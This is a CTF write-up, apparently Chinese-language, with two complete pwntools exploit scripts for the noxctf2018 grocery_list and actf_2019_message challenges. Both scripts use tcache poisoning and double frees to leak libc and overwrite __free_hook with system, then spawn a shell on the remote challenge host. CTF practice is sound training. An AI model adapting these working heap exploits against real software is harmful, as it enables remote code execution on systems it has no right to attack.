noxctf2018_grocery_list
先是觀察函數發現有一個可以泄露棧地址然後通過tcache attack打到棧上泄露libcbase然後再次寫入free_hook拿到shell
exp:
#!/usr/bin/python2
from pwn import *
#p=process('./GroceryList')
p=remote('node3.buuoj.cn',26988)
elf=ELF('./GroceryList')
libc=elf.libc
sda=lambda data,data1:p.sendlineafter('%s'%(data),data1)
rec=lambda data:p.recvuntil(data)
def show():
sda('Exit','1')
def add(sele,name):
sda('Exit','2')
sda('?',str(sele))
sda(':',name)
def empadd(sele,man):
sda('Exit','3')
sda('?',str(sele))
sda('?',str(man))
def delete(idx):
sda('Exit','4')
sda('?',str(idx))
def edit(idx,name):
sda('Exit','5')
sda('?',str(idx))
sda(':',name)
def Tadd():
sda('Exit','6')
add(2,'\x11'*4)#0
add(2,'\x12'*4)#1
Tadd()#2
add(2,'\x09'*9)#3
#Tadd()
show()
stack_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-11
log.success('stack_addr: '+hex(stack_addr))
delete(3)
payload=p64(0)*3+p64(0x41)+p64(stack_addr)
edit(2,payload)
add(2,'doudou')
empadd(2,1)
#Tadd()
#delete(2)
#show()
show()
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-231-libc.sym['__libc_start_main']
log.success('libcbase: '+hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
add(3,'doudou')
delete(5)
payload=p64(0)*7+p64(0x71)+p64(free_hook)
edit(3,payload)
add(3,'/bin/sh\x00')
add(3,p64(system))
delete(5)
p.interactive()
actf_2019_message
沒開PIE直接亂打一通~~
exp:
from pwn import *
#p=process('./ACTF_2019_message')
p=remote('node3.buuoj.cn',26585)
elf=ELF('./ACTF_2019_message')
libc=elf.libc
sd=lambda data:p.send(data)
sda=lambda data,data2:p.sendlineafter('%s'%(data),data2)
def add(size,content):
sda(': ','1')
sda(':',str(size))
#sda(':',content)
p.sendafter(':',content)
def delete(idx):
sda(': ','2')
sda(':',str(idx))
def edit(idx,content):
sda(': ','3')
sda(':',str(idx))
#sda(':',content)
p.sendafter(':',content)
def show(idx):
sda(': ','4')
sda(':',str(idx))
def exp():
add(0x68,'\x09'*9)#0
add(0x450,'\x08'*8)#1
add(0x68,'/bin/sh\x00')#2
add(0x58,'\x07'*7)#3
delete(0)
delete(0)
delete(1)
add(0x68,p64(0x000602060))
add(0x68,'doudou')
add(0x68,p64(0)*2+p64(0x460))
show(1)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
delete(3)
delete(3)
add(0x58,p64(free_hook))
add(0x58,'doudou')
add(0x58,p64(system))
delete(2)
#show(2)
p.interactive()
if __name__=="__main__":
exp()